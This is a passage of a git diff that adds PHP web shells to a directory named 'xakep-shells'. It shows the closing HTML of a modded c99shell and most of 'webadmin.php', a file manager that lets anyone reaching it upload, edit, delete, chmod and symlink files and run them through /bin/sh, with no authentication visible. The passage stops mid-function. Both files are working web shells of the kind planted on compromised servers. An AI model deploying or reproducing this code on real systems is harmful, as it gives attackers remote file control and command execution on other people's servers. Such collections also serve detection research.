+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>Enter Directory </b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <b>Access File</b>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table>
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/xakep-shells/PHP/webadmin.php.php.txt b/xakep-shells/PHP/webadmin.php.php.txt
new file mode 100644
index 0000000..9e0928e
--- /dev/null
+++ b/xakep-shells/PHP/webadmin.php.php.txt
@@ -0,0 +1,2491 @@
+<?php
+/*
+ * webadmin.php - a simple Web-based file manager
+ * Copyright (C) 2004  Daniel Wacker <daniel.wacker@web.de>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+ * -------------------------------------------------------------------------
+ * While using this script, do NOT navigate with your browser's back and
+ * forward buttons! Always open files in a new browser tab!
+ * -------------------------------------------------------------------------
+ *
+ * This is Version 0.9, revision 9
+ * =========================================================================
+ *
+ * Changes of revision 9
+ * <daniel.wacker@web.de>
+ *    added workaround for directory listing, if lstat() is disabled
+ *    fixed permisson of uploaded files (thanks to Stephan Duffner)
+ *
+ * Changes of revision 8
+ * <okankan@stud.sdu.edu.tr>
+ *    added Turkish translation
+ * <j@kub.cz>
+ *    added Czech translation
+ * <daniel.wacker@web.de>
+ *    improved charset handling
+ *
+ * Changes of revision 7
+ * <szuniga@vtr.net>
+ *    added Spanish translation
+ * <lars@soelgaard.net>
+ *    added Danish translation
+ * <daniel.wacker@web.de>
+ *    improved rename dialog
+ *
+ * Changes of revision 6
+ * <nederkoorn@tiscali.nl>
+ *    added Dutch translation
+ *
+ * Changes of revision 5
+ * <daniel.wacker@web.de>
+ *    added language auto select
+ *    fixed symlinks in directory listing
+ *    removed word-wrap in edit textarea
+ *
+ * Changes of revision 4
+ * <daloan@guideo.fr>
+ *    added French translation
+ * <anders@wiik.cc>
+ *    added Swedish translation
+ *
+ * Changes of revision 3
+ * <nzunta@gabriele-erba.it>
+ *    improved Italian translation
+ *
+ * Changes of revision 2
+ * <daniel.wacker@web.de>
+ *    got images work in some old browsers
+ *    fixed creation of directories
+ *    fixed files deletion
+ *    improved path handling
+ *    added missing word 'not_created'
+ * <till@tuxen.de>
+ *    improved human readability of file sizes
+ * <nzunta@gabriele-erba.it>
+ *    added Italian translation
+ *
+ * Changes of revision 1
+ * <daniel.wacker@web.de>
+ *    webadmin.php completely rewritten:
+ *    - clean XHTML/CSS output
+ *    - several files selectable
+ *    - support for windows servers
+ *    - no more treeview, because
+ *      - webadmin.php is a >simple< file manager
+ *      - performance problems (too much additional code)
+ *      - I don't like: frames, java-script, to reload after every treeview-click
+ *    - execution of shell scripts
+ *    - introduced revision numbers
+ *
+/* ------------------------------------------------------------------------- */
+
+/* Your language:
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'nl' - Dutch
+ * 'se' - Swedish
+ * 'sp' - Spanish
+ * 'dk' - Danish
+ * 'tr' - Turkish
+ * 'cs' - Czech
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of output:
+ * possible values are described in the charset table at
+ * http://www.php.net/manual/en/function.htmlentities.php
+ * 'auto' - use the same charset as the words of my language are encoded
+ */
+$site_charset = 'auto';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the edit textarea
+ */
+$editcols = 80;
+$editrows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (remove # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if (!function_exists('lstat')) {
+	function lstat ($filename) {
+		return stat($filename);
+	}
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+if ($site_charset == 'auto') {
+	$site_charset = $word_charset;
+}
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'download':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
+		@chmod($dest, $filepermission);
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			edit($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'delete':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_deleted', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('deleted', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_delete') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'rename':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (!@file_exists($dest) && @rename($file, $dest)) {
+			listing_page(notice('renamed', $file, $dest));
+		} else {
+			listing_page(error('not_renamed', $file, $dest));
+		}
+
+	} else {
+
+		$name = basename($file);
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="rename" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('rename_file') . '</b>
+	<p>' . html($file) . '</p>
+	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
+	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
+	<hr />
+	<input type="submit" value="' . word('rename') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'move':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @rename($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_moved', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('moved', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('move_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('destination') . ':
+	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('move') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'copy':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @copy($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('copy_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('destination') . ':
+	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('copy') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('destination') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'edit':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			edit($file);
+		} else {
+			listing_page(error('not_edited', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">webadmin.php</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
